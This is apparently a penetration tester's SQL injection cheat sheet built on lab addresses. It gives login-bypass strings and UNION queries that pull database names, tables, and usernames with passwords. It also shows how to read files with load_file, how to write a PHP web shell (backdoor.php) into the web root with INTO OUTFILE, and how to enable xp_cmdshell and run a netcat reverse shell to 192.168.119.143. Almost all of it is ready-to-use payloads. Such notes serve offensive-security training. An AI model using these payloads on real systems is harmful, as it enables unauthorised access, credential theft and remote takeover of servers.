sqli

sqli

  • Detection

    add ‘ in parameter

  • Auth Bypass

    `````admin**' or 1=1 LIMIT 1;#**`

    ' or 1=1-- -

    ' or '1'='1

    ‘ or 1=1 --

  • Column Enum

    http://10.11.0.22/debug.php?id=1 order by 1-- ****this will give error when number of coulmn exceed. so change the number to get correct columns

  • Union to get all data

    Suppose columns are 3, below will check which column is display output

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, 3--**

  • Extract data through union

    Suppose 2 and 3 is displayed. Now this will tell user and version of sql

    http://10.11.0.22/debug.php?id=1 **union all select 1, user(), @@version**

    Get database name

    http://10.11.0.22/debug.php?id=1 **union all select 1, schema_name, 3 from information_schema.schemata**

    Tell table name

    http://10.11.0.22/debug.php?id=1 **union all select 1, table_name, 3 from information_schema.tables** this will give only 1 table to get all use http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’mysql’

    tell column name from users table

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, column_name from information_schema.columns where table_name='users'**

    Suppose there are 2 column username and password

    http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from users**

    http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from mysql.users**

  • Code execution

    Depending on OS, below will local file output

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')**

    INTO OUTFILE is used to create malicious file web root

    http://10.11.0.22/debug.php?id=1 **union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'**

    It might give error but file is created. Visit /backdoor.php?cmd=dir to check

  • Reverse shell

    • Database enumeration is not usefull in some cases so do reverse shell

    • Enable xp_cmdshell

      • ' EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

    • upload nc.exe from linux to victim

    • reverse shell

      • nc -nvlp 4444

      • ' EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe 192.168.119.143 4444 -e cmd.exe"' --

  • Reference

    https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/

    • Blind SQLI

    https://linuxhint.com/blind_sql_injection_tutorial/

  • https://linuxhint.com/blind_sql_injection_tutorial/

  • For oracle injectionhttps://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html

  • https://book.hacktricks.xyz/pentesting-web/sql-injection

  • CHeatsheet

PreviousFile Inclusion VulnNextmisc

Last updated